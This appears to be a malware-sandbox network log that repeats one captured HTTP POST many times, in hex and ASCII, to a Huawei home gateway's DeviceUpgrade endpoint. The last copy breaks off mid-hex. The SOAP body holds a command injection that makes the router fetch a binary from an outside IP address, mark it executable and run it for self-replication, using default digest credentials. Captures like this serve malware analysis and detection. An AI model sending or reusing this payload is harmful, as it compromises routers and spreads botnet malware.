                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 